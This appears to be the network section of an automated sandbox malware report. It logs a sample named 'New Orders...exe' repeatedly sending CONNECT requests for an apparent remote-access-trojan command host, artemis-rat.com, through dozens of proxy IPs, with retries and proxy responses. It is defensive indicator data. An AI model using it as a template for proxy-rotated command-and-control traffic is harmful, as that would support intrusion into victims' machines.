                                                                                        1652192.168.2.95005981.19.3.249100807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.203221083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1653192.168.2.950153188.132.222.4080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.207806110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.823088884 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1654192.168.2.9547008.217.95.4488997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.207925081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1655192.168.2.95468441.231.37.7631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.208208084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.634325027 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1656192.168.2.954461117.160.250.16388287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.208242893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.974076986 CET221INHTTP/1.1 403 Access Denied
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: no-store
                                                                                        Content-Type: text/html
                                                                                        Content-Language: en
                                                                                        Content-Length: 43
                                                                                        Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                        Data Ascii: You are not allowed to access the document.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1657192.168.2.950112159.112.141.4480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.211045027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.242161989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.292010069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.445234060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1658192.168.2.954687219.243.212.11880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.211136103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.104887962 CET22INHTTP/1.1 502 ERROR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1659192.168.2.950197199.223.255.10931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.211625099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.242161036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.292006969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.130872965 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1660192.168.2.954892211.234.125.54437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.214623928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1661192.168.2.95489345.144.30.2324437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.216705084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1662192.168.2.950097190.128.241.102807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.220168114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.242229939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.292020082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.445249081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.444979906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.445530891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:35.445019007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:59.445049047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1663192.168.2.954669103.76.180.10831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.221040010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.607588053 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1664192.168.2.954161122.114.232.1378087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.221276045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1665192.168.2.95464920.219.178.12131297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.221457958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.634157896 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1666192.168.2.954848104.18.220.95807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.224948883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.383538008 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1667192.168.2.953305192.169.226.96505787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.228101015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.242221117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.292046070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.445265055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.445053101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.445360899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:35.445064068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:59.445048094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:47.463323116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1668192.168.2.950176165.232.89.11631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.241637945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.242221117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.292028904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.445241928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1669192.168.2.95496045.144.30.2324437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.242445946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1670192.168.2.954959211.234.125.54437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.242449045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1671192.168.2.954737190.110.226.162807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.244036913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148106098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.242583990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.395051956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.561188936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.742115974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.009860992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:12.447338104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:29.132527113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:32.751990080 CET811INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:18:32 GMT
                                                                                        Server: Apache/2.4.57 (Ubuntu)
                                                                                        Content-Length: 619
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 6f 70 6f 72 74 65 74 69 40 63 6f 64 65 31 30 30 2e 63 6f 6d 2e 70 79 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at soporteti@code100.com.py to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1672192.168.2.95499443.153.174.44437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
